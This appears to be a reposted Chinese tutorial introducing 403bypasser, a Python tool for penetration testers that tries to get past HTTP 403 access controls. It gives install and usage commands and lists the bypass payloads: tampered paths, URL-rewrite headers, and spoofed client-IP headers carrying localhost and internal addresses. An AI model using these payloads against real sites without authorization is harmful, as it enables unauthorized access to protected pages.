如何使用403bypasser绕过目标页面上的访问控制限制
2023-6-9 08:10:12 Author: 系统安全运维(查看原文) 阅读量:42 收藏

关于403bypasser

403bypasser是一款自动化工具,该工具能够以自动化的形式实现针对目标页面的访问控制限制绕过技术。403bypasser项目目前仍处于积极开发阶段,并且还会增加新的功能。

该工具基于Python语言开发,因此具备良好的跨平台特性。

工具安装

首先,我们需要使用下列命令将该项目源码克隆至本地:

git clone https://github.com/yunemse48/403bypasser.git

接下来,运行下列命令安装好该工具所需的依赖模块:

pip install -r requirements.txt

此时,403bypasser已完成安装。

工具参数

工具使用

使用样例1

python3 403bypasser.py -u https://example.com -d /secret

使用样例2

python3 403bypasser.py -u https://example.com -D dirlist.txt

使用样例3

python3 403bypasser.py -U urllist.txt -d /secret

使用样例4

python3 403bypasser.py -U urllist.txt -D dirlist.txt

注意事项:下面给出的例子中,不同斜杠使用的结果都是一样的,你可以选择自己喜欢的方式:

python3 403bypasser.py -u https://example.com -d secret

python3 403bypasser.py -u https://example.com -d /secret

python3 403bypasser.py -u https://example.com -d /secret/

python3 403bypasser.py -u https://example.com -d secret/

python3 403bypasser.py -u https://example.com/ -d secret

该工具支持的功能

请求方法篡改

将GET请求转换为POST请求

路径篡改

/%2e/secret

/secret/

/secret..;/

/secret/..;/

/secret%20

/secret%09

/secret%00

/secret.json

/secret.css

/secret.html

/secret?

/secret??

/secret???

/secret?testparam

/secret#

/secret#test

/secret/.

//secret//

/./secret/./

通过非标准Header重写目标URL

X-Original-URL: /secret

X-Rewrite-URL: /secret

其他Header&值

Header:

X-Custom-IP-Authorization

X-Forwarded-For

X-Forward-For

X-Remote-IP

X-Originating-IP

X-Remote-Addr

X-Client-IP

X-Real-IP

值:

localhost

localhost:80

localhost:443

127.0.0.1

127.0.0.1:80

127.0.0.1:443

2130706433

0x7F000001

0177.0000.0000.0001

0

127.1

10.0.0.0

10.0.0.1

172.16.0.0

172.16.0.1

192.168.1.0

192.168.1.1

工具运行截图

项目地址

403bypasser:https://github.com/yunemse48/403bypasser

声明:本公众号所分享内容仅用于网安爱好者之间的技术讨论,禁止用于违法途径,所有渗透都需获取授权否则需自行承担,本公众号及原作者不承担相应的后果.

如有侵权,请联系删除

好文推荐

红队打点评估工具推荐
干货|红队项目日常渗透笔记
实战|后台getshell+提权一把梭
一款漏洞查找器(挖漏洞的有力工具)
神兵利器 | 附下载 · 红队信息搜集扫描打点利器
神兵利器 | 分享 直接上手就用的内存马(附下载)
推荐一款自动向hackerone发送漏洞报告的扫描器
关注我,学习网络安全不迷路

文章来源: http://mp.weixin.qq.com/s?__biz=Mzk0NjE0NDc5OQ==&mid=2247520748&idx=2&sn=be73da82482995629fbda37053d690cf&chksm=c308429cf47fcb8a771d93b4bc15b11de42ac864fed0c01efb248661f5c5ef487ef12ee3d6a2#rd
如有侵权请联系:admin#unsafe.sh